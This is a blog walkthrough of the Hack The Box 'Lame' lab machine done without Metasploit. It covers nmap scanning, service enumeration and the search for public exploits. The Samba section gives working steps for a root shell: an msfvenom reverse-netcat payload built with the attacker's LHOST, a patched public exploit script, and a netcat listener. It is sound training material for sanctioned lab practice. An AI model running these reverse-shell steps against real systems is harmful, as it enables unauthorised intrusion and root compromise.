Skip to content

HTB Writeup: Lame w/o Metasploit

Published by Bobby Lin on April 4, 2021
Views: 112

Overview

  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploits scripts for each service versions for gaining root.
  • Test the exploits to see if the discovered services are exploitable.

Recon

nmap options

  • -O <Enable OS detection
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3

We can see there is an additional service that is not discovered by the quick scan


Enumeration

We discovered five attack surfaces from our port scanning results. They are:

  1. ftp (port:21, version: vsftpd 2.3.4)
  2. ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

FTP

One convenient way of checking if the service version has an exploit is to use the searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.

We can try googling for a python exploit. I found this in github:

https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.

SSH

There were a few user enumeration attack on SSH. This usually takes time and we can come back if the other services are not exploitable.

Samba

This particular version of Samba has exploit available.

I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

You will need to update the script by following the steps below:

  • Get your LHOST:ip addr|grep tun0
  • Generate the reverse netcat buffer payload:msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
  • Replace line 8 to 15 with the generated payload from msfvenom.
  • Update victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb

Exploit

Samba

  • Start netcat: nc -nlvp 1337
  • Run the exploit: python3 exploit-smb-3.0.20.py

Now can run command now to get the FLAG in as the root user.


Reflections on the lab

This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:

  • This is abit different from purely web application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits, modifying and debugging the scripts that you found online.
  • You need to know some tools such as msfvenom, netcat and python etc.
  • Also port scanning needs to be thorough in order to discover more services that the quick scan does not find.
Published inHack The BoxWalkthrough

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *